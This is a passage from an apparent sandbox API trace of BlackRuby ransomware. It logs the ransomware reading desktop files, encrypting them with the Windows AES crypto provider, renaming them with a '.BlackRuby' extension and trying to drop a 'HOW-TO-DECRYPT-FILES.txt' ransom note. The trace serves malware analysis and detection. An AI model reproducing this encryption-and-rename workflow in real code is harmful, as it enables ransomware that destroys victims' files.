(lpFileName="C:\\Users\\EEBsYm5\\Desktop\\3mFJCUz8E.rtf" (normalized: "c:\\users\\eebsym5\\desktop\\3mfjcuz8e.rtf"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x184 [0055.559] GetLastError () returned 0xb7 [0055.559] GetFileType (hFile=0x184) returned 0x1 [0055.559] SetErrorMode (uMode=0x0) returned 0x1 [0055.559] GetFileType (hFile=0x184) returned 0x1 [0055.560] CloseHandle (hObject=0x184) returned 1 [0055.560] GetLastError () returned 0xb7 [0055.560] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\3mFJCUz8E.rtf", nBufferLength=0x105, lpBuffer=0x18e954, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop\\3mFJCUz8E.rtf", lpFilePart=0x0) returned 0x26 [0055.560] GetLastError () returned 0xb7 [0055.560] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\Encrypted_WuRaNL2TqMfmc2FdbcfagGjX5yBUN1s4MeyQNI4B.BlackRuby", nBufferLength=0x105, lpBuffer=0x18e954, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop\\Encrypted_WuRaNL2TqMfmc2FdbcfagGjX5yBUN1s4MeyQNI4B.BlackRuby", lpFilePart=0x0) returned 0x55 [0055.560] GetLastError () returned 0xb7 [0055.560] SetErrorMode (uMode=0x1) returned 0x0 [0055.561] GetFileAttributesExW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\3mFJCUz8E.rtf" (normalized: "c:\\users\\eebsym5\\desktop\\3mfjcuz8e.rtf"), fInfoLevelId=0x0, lpFileInformation=0x18edd4 | out: lpFileInformation=0x18edd4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6c4ac540, ftCreationTime.dwHighDateTime=0x1d35451, ftLastAccessTime.dwLowDateTime=0x1e6bf540, ftLastAccessTime.dwHighDateTime=0x1d34db4, ftLastWriteTime.dwLowDateTime=0x294fb1c0, ftLastWriteTime.dwHighDateTime=0x1d39df7, nFileSizeHigh=0x0, nFileSizeLow=0x57e0)) returned 1 [0055.561] GetLastError () returned 0xb7 [0055.561] SetErrorMode (uMode=0x0) returned 0x1 [0055.561] MoveFileW (lpExistingFileName="C:\\Users\\EEBsYm5\\Desktop\\3mFJCUz8E.rtf" (normalized: "c:\\users\\eebsym5\\desktop\\3mfjcuz8e.rtf"), lpNewFileName="C:\\Users\\EEBsYm5\\Desktop\\Encrypted_WuRaNL2TqMfmc2FdbcfagGjX5yBUN1s4MeyQNI4B.BlackRuby" (normalized: "c:\\users\\eebsym5\\desktop\\encrypted_wuranl2tqmfmc2fdbcfaggjx5ybun1s4meyqni4b.blackruby")) returned 1 [0055.561] GetLastError () returned 0xb7 [0055.562] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\HOW-TO-DECRYPT-FILES.txt", nBufferLength=0x105, lpBuffer=0x18e838, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop\\HOW-TO-DECRYPT-FILES.txt", lpFilePart=0x0) returned 0x31 [0055.562] GetLastError () returned 0xb7 [0055.562] SetErrorMode (uMode=0x1) returned 0x0 [0055.562] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\Desktop\\HOW-TO-DECRYPT-FILES.txt" (normalized: "c:\\users\\eebsym5\\desktop\\how-to-decrypt-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0xffffffff [0055.562] GetLastError () returned 0x5 [0055.563] SetErrorMode (uMode=0x0) returned 0x1 [0055.563] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\7hLTTflOuISFTLu7K.avi", nBufferLength=0x105, lpBuffer=0x18e98c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop\\7hLTTflOuISFTLu7K.avi", lpFilePart=0x0) returned 0x2e [0055.563] GetLastError () returned 0x5 [0055.563] SetErrorMode (uMode=0x1) returned 0x0 [0055.563] GetFileAttributesExW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\7hLTTflOuISFTLu7K.avi" (normalized: "c:\\users\\eebsym5\\desktop\\7hlttflouisftlu7k.avi"), fInfoLevelId=0x0, lpFileInformation=0x1bcfa0c | out: lpFileInformation=0x1bcfa0c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xde043270, ftCreationTime.dwHighDateTime=0x1d350eb, ftLastAccessTime.dwLowDateTime=0x74885c0, ftLastAccessTime.dwHighDateTime=0x1d35077, ftLastWriteTime.dwLowDateTime=0x74885c0, ftLastWriteTime.dwHighDateTime=0x1d35077, nFileSizeHigh=0x0, nFileSizeLow=0x58c1)) returned 1 [0055.563] GetLastError () returned 0x5 [0055.563] SetErrorMode (uMode=0x0) returned 0x1 [0055.563] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\7hLTTflOuISFTLu7K.avi", nBufferLength=0x105, lpBuffer=0x18e954, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop\\7hLTTflOuISFTLu7K.avi", lpFilePart=0x0) returned 0x2e [0055.563] GetLastError () returned 0x5 [0055.563] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\7hLTTflOuISFTLu7K.avi", nBufferLength=0x105, lpBuffer=0x18e828, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop\\7hLTTflOuISFTLu7K.avi", lpFilePart=0x0) returned 0x2e [0055.563] GetLastError () returned 0x5 [0055.563] SetErrorMode (uMode=0x1) returned 0x0 [0055.564] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\Desktop\\7hLTTflOuISFTLu7K.avi" (normalized: "c:\\users\\eebsym5\\desktop\\7hlttflouisftlu7k.avi"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x184 [0055.564] GetLastError () returned 0x0 [0055.564] GetFileType (hFile=0x184) returned 0x1 [0055.564] SetErrorMode (uMode=0x0) returned 0x1 [0055.564] GetFileType (hFile=0x184) returned 0x1 [0055.564] GetFileSize (in: hFile=0x184, lpFileSizeHigh=0x18eddc | out: lpFileSizeHigh=0x18eddc*=0x0) returned 0x58c1 [0055.564] GetLastError () returned 0x0 [0055.564] ReadFile (in: hFile=0x184, lpBuffer=0x1bd1b58, nNumberOfBytesToRead=0x58c1, lpNumberOfBytesRead=0x18ed84, lpOverlapped=0x0 | out: lpBuffer=0x1bd1b58*, lpNumberOfBytesRead=0x18ed84*=0x58c1, lpOverlapped=0x0) returned 1 [0055.565] GetLastError () returned 0x0 [0055.565] CloseHandle (hObject=0x184) returned 1 [0055.565] GetLastError () returned 0x0 [0055.565] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\7hLTTflOuISFTLu7K.avi", nBufferLength=0x105, lpBuffer=0x18e938, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop\\7hLTTflOuISFTLu7K.avi", lpFilePart=0x0) returned 0x2e [0055.565] GetLastError () returned 0x0 [0055.565] SetErrorMode (uMode=0x1) returned 0x0 [0055.565] GetFileAttributesExW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\7hLTTflOuISFTLu7K.avi" (normalized: "c:\\users\\eebsym5\\desktop\\7hlttflouisftlu7k.avi"), fInfoLevelId=0x0, lpFileInformation=0x18edec | out: lpFileInformation=0x18edec*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xde043270, ftCreationTime.dwHighDateTime=0x1d350eb, ftLastAccessTime.dwLowDateTime=0x74885c0, ftLastAccessTime.dwHighDateTime=0x1d35077, ftLastWriteTime.dwLowDateTime=0x74885c0, ftLastWriteTime.dwHighDateTime=0x1d35077, nFileSizeHigh=0x0, nFileSizeLow=0x58c1)) returned 1 [0055.565] GetLastError () returned 0x0 [0055.565] SetErrorMode (uMode=0x0) returned 0x1 [0055.576] CryptImportKey (in: hProv=0x37c708, pbData=0x1c370a8, dwDataLen=0x2c, hPubKey=0x0, dwFlags=0x1, phKey=0x18ed28 | out: phKey=0x18ed28*=0x360ee0) returned 1 [0055.576] GetLastError () returned 0x0 [0055.576] CryptContextAddRef (hProv=0x37c708, pdwReserved=0x0, dwFlags=0x0) returned 1 [0055.576] GetLastError () returned 0x0 [0055.581] CryptContextAddRef (hProv=0x37c708, pdwReserved=0x0, dwFlags=0x0) returned 1 [0055.581] GetLastError () returned 0x0 [0055.581] CryptDuplicateKey (in: hKey=0x360ee0, pdwReserved=0x0, dwFlags=0x0, phKey=0x18ece4 | out: phKey=0x18ece4*=0x3609e0) returned 1 [0055.581] CryptContextAddRef (hProv=0x37c708, pdwReserved=0x0, dwFlags=0x0) returned 1 [0055.581] GetLastError () returned 0x0 [0055.582] CryptSetKeyParam (hKey=0x3609e0, dwParam=0x4, pbData=0x1c640f4*=0x1, dwFlags=0x0) returned 1 [0055.582] GetLastError () returned 0x0 [0055.582] CryptSetKeyParam (hKey=0x3609e0, dwParam=0x1, pbData=0x1c640c0, dwFlags=0x0) returned 1 [0055.582] GetLastError () returned 0x0 [0055.582] CryptEncrypt (in: hKey=0x3609e0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1c6413c*, pdwDataLen=0x18ed74*=0x59c0, dwBufLen=0x59c0 | out: pbData=0x1c6413c*, pdwDataLen=0x18ed74*=0x59c0) returned 1 [0055.582] GetLastError () returned 0x0 [0055.582] CryptEncrypt (in: hKey=0x3609e0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1c6f4e8*, pdwDataLen=0x18ed8c*=0x10, dwBufLen=0x10 | out: pbData=0x1c6f4e8*, pdwDataLen=0x18ed8c*=0x10) returned 1 [0055.582] GetLastError () returned 0x0 [0055.582] CryptEncrypt (in: hKey=0x3609e0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x1c6f518*, pdwDataLen=0x18ed94*=0x0, dwBufLen=0x10 | out: pbData=0x1c6f518*, pdwDataLen=0x18ed94*=0x10) returned 1 [0055.582] GetLastError () returned 0x0 [0055.582] CryptDestroyKey (hKey=0x360ee0) returned 1 [0055.582] CryptReleaseContext (hProv=0x37c708, dwFlags=0x0) returned 1 [0055.582] CryptReleaseContext (hProv=0x37c708, dwFlags=0x0) returned 1 [0055.582] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\7hLTTflOuISFTLu7K.avi", nBufferLength=0x105, lpBuffer=0x18e830, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop\\7hLTTflOuISFTLu7K.avi", lpFilePart=0x0) returned 0x2e [0055.582] GetLastError () returned 0x0 [0055.582] SetErrorMode (uMode=0x1) returned 0x0 [0055.583] GetFileType (hFile=0x184) returned 0x1 [0055.584] SetErrorMode (uMode=0x0) returned 0x1 [0055.584] GetFileType (hFile=0x184) returned 0x1 [0055.584] WriteFile (in: hFile=0x184, lpBuffer=0x1c7a8d4*, nNumberOfBytesToWrite=0x59d0, lpNumberOfBytesWritten=0x18ed90, lpOverlapped=0x0 | out: lpBuffer=0x1c7a8d4*, lpNumberOfBytesWritten=0x18ed90*=0x59d0, lpOverlapped=0x0) returned 1 [0055.585] GetLastError () returned 0xb7 [0055.585] CloseHandle (hObject=0x184) returned 1 [0055.585] GetLastError () returned 0xb7 [0055.585] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\7hLTTflOuISFTLu7K.avi", nBufferLength=0x105, lpBuffer=0x18e954, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop\\7hLTTflOuISFTLu7K.avi", lpFilePart=0x0) returned 0x2e [0055.585] GetLastError () returned 0xb7 [0055.585] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\Encrypted_JlTnSPbHAzM65vbOjtrqDD00INJTEMGxX41MPLjGTl29CC.BlackRuby", nBufferLength=0x105, lpBuffer=0x18e954, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop\\Encrypted_JlTnSPbHAzM65vbOjtrqDD00INJTEMGxX41MPLjGTl29CC.BlackRuby", lpFilePart=0x0) returned 0x5b [0055.585] GetLastError () returned 0xb7 [0055.585] SetErrorMode (uMode=0x1) returned 0x0 [0055.585] GetFileAttributesExW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\7hLTTflOuISFTLu7K.avi" (normalized: "c:\\users\\eebsym5\\desktop\\7hlttflouisftlu7k.avi"), fInfoLevelId=0x0, lpFileInformation=0x18edd4 | out: lpFileInformation=0x18edd4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xde043270, ftCreationTime.dwHighDateTime=0x1d350eb, ftLastAccessTime.dwLowDateTime=0x74885c0, ftLastAccessTime.dwHighDateTime=0x1d35077, ftLastWriteTime.dwLowDateTime=0x29521320, ftLastWriteTime.dwHighDateTime=0x1d39df7, nFileSizeHigh=0x0, nFileSizeLow=0x59d0)) returned 1 [0055.585] GetLastError () returned 0xb7 [0055.585] SetErrorMode (uMode=0x0) returned 0x1 [0055.585] MoveFileW (lpExistingFileName="C:\\Users\\EEBsYm5\\Desktop\\7hLTTflOuISFTLu7K.avi" (normalized: "c:\\users\\eebsym5\\desktop\\7hlttflouisftlu7k.avi"), lpNewFileName="C:\\Users\\EEBsYm5\\Desktop\\Encrypted_JlTnSPbHAzM65vbOjtrqDD00INJTEMGxX41MPLjGTl29CC.BlackRuby" (normalized: "c:\\users\\eebsym5\\desktop\\encrypted_jltnspbhazm65vbojtrqdd00injtemgxx41mpljgtl29cc.blackruby")) returned 1 [0055.587] GetLastError () returned 0xb7 [0055.587] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\HOW-TO-DECRYPT-FILES.txt", nBufferLength=0x105, lpBuffer=0x18e838, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop\\HOW-TO-DECRYPT-FILES.txt", lpFilePart=0x0) returned 0x31 [0055.587] GetLastError () returned 0xb7 [0055.587] SetErrorMode (uMode=0x1) returned 0x0 [0055.587] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\Desktop\\HOW-TO-DECRYPT-FILES.txt" (normalized: "c:\\users\\eebsym5\\desktop\\how-to-decrypt-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0xffffffff [0055.587] GetLastError () returned 0x5 [0055.589] SetErrorMode (uMode=0x0) returned 0x1 [0055.589] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\7QQBSYeSI8xVdyMZSxe.doc", nBufferLength=0x105, lpBuffer=0x18e98c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop\\7QQBSYeSI8xVdyMZSxe.doc", lpFilePart=0x0) returned 0x30 [0055.589] GetLastError () returned 0x5 [0055.589] SetErrorMode (uMode=0x1) returned 0x0 [0055.589] GetFileAttributesExW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\7QQBSYeSI8xVdyMZSxe.doc" (normalized: "c:\\users\\eebsym5\\desktop\\7qqbsyesi8xvdymzsxe.doc"), fInfoLevelId=0x0, lpFileInformation=0x1c9d3a8 | out: lpFileInformation=0x1c9d3a8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x772dfc60, ftCreationTime.dwHighDateTime=0x1d34db8, ftLastAccessTime.dwLowDateTime=0xfbbb3a60, ftLastAccessTime.dwHighDateTime=0x1d34c37, ftLastWriteTime.dwLowDateTime=0xfbbb3a60, ftLastWriteTime.dwHighDateTime=0x1d34c37, nFileSizeHigh=0x0, nFileSizeLow=0x9a33)) returned 1 [0055.589] GetLastError () returned 0x5 [0055.589] SetErrorMode (uMode=0x0) returned 0x1 [0055.590] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\7QQBSYeSI8xVdyMZSxe.doc", nBufferLength=0x105, lpBuffer=0x18e954, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop\\7QQBSYeSI8xVdyMZSxe.doc", lpFilePart=0x0) returned 0x30 [0055.590] GetLastError () returned 0x5 [0055.590] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\7QQBSYeSI8xVdyMZSxe.doc", nBufferLength=0x105, lpBuffer=0x18e828, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop\\7QQBSYeSI8xVdyMZSxe.doc", lpFilePart=0x0) returned 0x30 [0055.590] GetLastError () returned 0x5 [0055.590] SetErrorMode (uMode=0x1) returned 0x0 [0055.590] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\Desktop\\7QQBSYeSI8xVdyMZSxe.doc" (normalized: "c:\\users\\eebsym5\\desktop\\7qqbsyesi8xvdymzsxe.doc"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x184 [0055.590] GetLastError () returned 0x0 [0055.590] GetFileType (hFile=0x184) returned 0x1 [0055.590] SetErrorMode (uMode=0x0) returned 0x1 [0055.590] GetFileType (hFile=0x184) returned 0x1 [0055.590] GetFileSize (in: hFile=0x184, lpFileSizeHigh=0x18eddc | out: lpFileSizeHigh=0x18eddc*=0x0) returned 0x9a33 [0055.590] GetLastError () returned 0x0 [0055.590] ReadFile (in: hFile=0x184, lpBuffer=0x1c9ef04, nNumberOfBytesToRead=0x9a33, lpNumberOfBytesRead=0x18ed84, lpOverlapped=0x0 | out: lpBuffer=0x1c9ef04*, lpNumberOfBytesRead=0x18ed84*=0x9a33, lpOverlapped=0x0) returned 1 [0055.591] GetLastError () returned 0x0 [0055.591] CloseHandle (hObject=0x184) returned 1 [0055.591] GetLastError () returned 0x0 [0055.591] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\7QQBSYeSI8xVdyMZSxe.doc", nBufferLength=0x105, lpBuffer=0x18e938, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop\\7QQBSYeSI8xVdyMZSxe.doc", lpFilePart=0x0) returned 0x30 [0055.591] GetLastError () returned 0x0 [0055.591] SetErrorMode (uMode=0x1) returned 0x0 [0055.591] GetFileAttributesExW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\7QQBSYeSI8xVdyMZSxe.doc" (normalized: "c:\\users\\eebsym5\\desktop\\7qqbsyesi8xvdymzsxe.doc"), fInfoLevelId=0x0, lpFileInformation=0x18edec | out: lpFileInformation=0x18edec*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x772dfc60, ftCreationTime.dwHighDateTime=0x1d34db8, ftLastAccessTime.dwLowDateTime=0xfbbb3a60, ftLastAccessTime.dwHighDateTime=0x1d34c37, ftLastWriteTime.dwLowDateTime=0xfbbb3a60, ftLastWriteTime.dwHighDateTime=0x1d34c37, nFileSizeHigh=0x0, nFileSizeLow=0x9a33)) returned 1 [0055.591] GetLastError () returned 0x0 [0055.591] SetErrorMode (uMode=0x0) returned 0x1 [0055.591] CryptAcquireContextW (in: phProv=0x18ed4c, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x18ed4c*=0x37c680) returned 1 [0055.591] GetLastError () returned 0x0 [0055.627] CryptImportKey (in: hProv=0x37c680, pbData=0x1d0c73c, dwDataLen=0x2c, hPubKey=0x0, dwFlags=0x1, phKey=0x18ed28 | out: phKey=0x18ed28*=0x360b60) returned 1 [0055.627] GetLastError () returned 0x0 [0055.627] CryptContextAddRef (hProv=0x37c680, pdwReserved=0x0, dwFlags=0x0) returned 1 [0055.627] GetLastError () returned 0x0 [0055.633] CryptContextAddRef (hProv=0x37c680, pdwReserved=0x0, dwFlags=0x0) returned 1 [0055.633] GetLastError () returned 0x0 [0055.633] CryptDuplicateKey (in: hKey=0x360b60, pdwReserved=0x0, dwFlags=0x0, phKey=0x18ece4 | out: phKey=0x18ece4*=0x360e20) returned 1 [0055.633] CryptContextAddRef (hProv=0x37c680, pdwReserved=0x0, dwFlags=0x0) returned 1 [0055.633] GetLastError () returned 0x0 [0055.633] CryptSetKeyParam (hKey=0x360e20, dwParam=0x4, pbData=0x1d39788*=0x1, dwFlags=0x0) returned 1 [0055.633] GetLastError () returned 0x0 [0055.633] CryptSetKeyParam (hKey=0x360e20, dwParam=0x1, pbData=0x1d39754, dwFlags=0x0) returned 1 [0055.633] GetLastError () returned 0x0 [0055.633] CryptEncrypt (in: hKey=0x360e20, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d397d0*, pdwDataLen=0x18ed74*=0x9b30, dwBufLen=0x9b30 | out: pbData=0x1d397d0*, pdwDataLen=0x18ed74*=0x9b30) returned 1 [0055.634] GetLastError () returned 0x0 [0055.634] CryptEncrypt (in: hKey=0x360e20, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d4ce5c*, pdwDataLen=0x18ed8c*=0x10, dwBufLen=0x10 | out: pbData=0x1d4ce5c*, pdwDataLen=0x18ed8c*=0x10) returned 1 [0055.634] GetLastError () returned 0x0 [0055.634] CryptEncrypt (in: hKey=0x360e20, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x1d4ce8c*, pdwDataLen=0x18ed94*=0x0, dwBufLen=0x10 | out: pbData=0x1d4ce8c*, pdwDataLen=0x18ed94*=0x10) returned 1 [0055.635] GetLastError () returned 0x0 [0055.638] CryptDestroyKey (hKey=0x360b60) returned 1 [0055.638] CryptReleaseContext (hProv=0x37c680, dwFlags=0x0) returned 1 [0055.638] CryptReleaseContext (hProv=0x37c680, dwFlags=0x0) returned 1 [0055.638] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\7QQBSYeSI8xVdyMZSxe.doc", nBufferLength=0x105, lpBuffer=0x18e830, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop\\7QQBSYeSI8xVdyMZSxe.doc", lpFilePart=0x0) returned 0x30 [0055.638] GetLastError () returned 0x0 [0055.638] SetErrorMode (uMode=0x1) returned 0x0 [0055.638] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\Desktop\\7QQBSYeSI8xVdyMZSxe.doc" (normalized: "c:\\users\\eebsym5\\desktop\\7qqbsyesi8xvdymzsxe.doc"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x184 [0055.639] GetLastError () returned 0xb7 [0055.639] GetFileType (hFile=0x184) returned 0x1 [0055.639] SetErrorMode (uMode=0x0) returned 0x1 [0055.639] GetFileType (hFile=0x184) returned 0x1 [0055.641] CloseHandle (hObject=0x184) returned 1 [0055.641] GetLastError () returned 0xb7 [0055.641] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\7QQBSYeSI8xVdyMZSxe.doc", nBufferLength=0x105, lpBuffer=0x18e954, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop\\7QQBSYeSI8xVdyMZSxe.doc", lpFilePart=0x0) returned 0x30 [0055.641] GetLastError () returned 0xb7 [0055.641] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\Encrypted_PR6nYI08bpYOCcyQxjrxpRzBE2W3CnQPKsL3X.BlackRuby", nBufferLength=0x105, lpBuffer=0x18e954, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop\\Encrypted_PR6nYI08bpYOCcyQxjrxpRzBE2W3CnQPKsL3X.BlackRuby", lpFilePart=0x0) returned 0x52 [0055.641] GetLastError () returned 0xb7 [0055.641] SetErrorMode (uMode=0x1) returned 0x0 [0055.641] GetFileAttributesExW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\7QQBSYeSI8xVdyMZSxe.doc" (normalized: "c:\\users\\eebsym5\\desktop\\7qqbsyesi8xvdymzsxe.doc"), fInfoLevelId=0x0, lpFileInformation=0x18edd4 | out: lpFileInformation=0x18edd4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x772dfc60, ftCreationTime.dwHighDateTime=0x1d34db8, ftLastAccessTime.dwLowDateTime=0xfbbb3a60, ftLastAccessTime.dwHighDateTime=0x1d34c37, ftLastWriteTime.dwLowDateTime=0x295b98a0, ftLastWriteTime.dwHighDateTime=0x1d39df7, nFileSizeHigh=0x0, nFileSizeLow=0x9b40)) returned 1 [0055.641] GetLastError () returned 0xb7 [0055.641] SetErrorMode (uMode=0x0) returned 0x1 [0055.641] MoveFileW (lpExistingFileName="C:\\Users\\EEBsYm5\\Desktop\\7QQBSYeSI8xVdyMZSxe.doc" (normalized: "c:\\users\\eebsym5\\desktop\\7qqbsyesi8xvdymzsxe.doc"), lpNewFileName="C:\\Users\\EEBsYm5\\Desktop\\Encrypted_PR6nYI08bpYOCcyQxjrxpRzBE2W3CnQPKsL3X.BlackRuby" (normalized: "c:\\users\\eebsym5\\desktop\\encrypted_pr6nyi08bpyoccyqxjrxprzbe2w3cnqpksl3x.blackruby")) returned 1 [0055.644] GetLastError () returned 0xb7 [0055.644] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\HOW-TO-DECRYPT-FILES.txt", nBufferLength=0x105, lpBuffer=0x18e838, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop\\HOW-TO-DECRYPT-FILES.txt", lpFilePart=0x0) returned 0x31 [0055.644] GetLastError () returned 0xb7 [0055.644] SetErrorMode (uMode=0x1) returned 0x0 [0055.644] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\Desktop\\HOW-TO-DECRYPT-FILES.txt" (normalized: "c:\\users\\eebsym5\\desktop\\how-to-decrypt-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0xffffffff [0055.644] GetLastError () returned 0x5 [0055.645] SetErrorMode (uMode=0x0) returned 0x1 [0055.646] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\8tDyd_-768O5WAxYhm7q.jpg", nBufferLength=0x105, lpBuffer=0x18e98c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop\\8tDyd_-768O5WAxYhm7q.jpg", lpFilePart=0x0) returned 0x31 [0055.646] GetLastError () returned 0x5 [0055.646] SetErrorMode (uMode=0x1) returned 0x0 [0055.646] GetFileAttributesExW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\8tDyd_-768O5WAxYhm7q.jpg" (normalized: "c:\\users\\eebsym5\\desktop\\8tdyd_-768o5waxyhm7q.jpg"), fInfoLevelId=0x0, lpFileInformation=0x1b92b60 | out: lpFileInformation=0x1b92b60*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8b4c88e0, ftCreationTime.dwHighDateTime=0x1d34e2d, ftLastAccessTime.dwLowDateTime=0x56ba8520, ftLastAccessTime.dwHighDateTime=0x1d35862, ftLastWriteTime.dwLowDateTime=0x56ba8520, ftLastWriteTime.dwHighDateTime=0x1d35862, nFileSizeHigh=0x0, nFileSizeLow=0x2800)) returned 1 [0055.646] GetLastError () returned 0x5 [0055.646] SetErrorMode (uMode=0x0) returned 0x1 [0055.646] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\8tDyd_-768O5WAxYhm7q.jpg", nBufferLength=0x105, lpBuffer=0x18e954, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop\\8tDyd_-768O5WAxYhm7q.jpg", lpFilePart=0x0) returned 0x31 [0055.646] GetLastError () returned 0x5 [0055.646] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\8tDyd_-768O5WAxYhm7q.jpg", nBufferLength=0x105, lpBuffer=0x18e828, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop\\8tDyd_-768O5WAxYhm7q.jpg", lpFilePart=0x0) returned 0x31 [0055.646] GetLastError () returned 0x5 [0055.646] SetErrorMode (uMode=0x1) returned 0x0 [0055.646] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\Desktop\\8tDyd_-768O5WAxYhm7q.jpg" (normalized: "c:\\users\\eebsym5\\desktop\\8tdyd_-768o5waxyhm7q.jpg"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x184 [0055.646] GetLastError () returned 0x0 [0055.646] GetFileType (hFile=0x184) returned 0x1 [0055.646] SetErrorMode (uMode=0x0) returned 0x1 [0055.646] GetFileType (hFile=0x184) returned 0x1 [0055.647] GetFileSize (in: hFile=0x184, lpFileSizeHigh=0x18eddc | out: lpFileSizeHigh=0x18eddc*=0x0) returned 0x2800 [0055.647] GetLastError () returned 0x0 [0055.647] ReadFile (in: hFile=0x184, 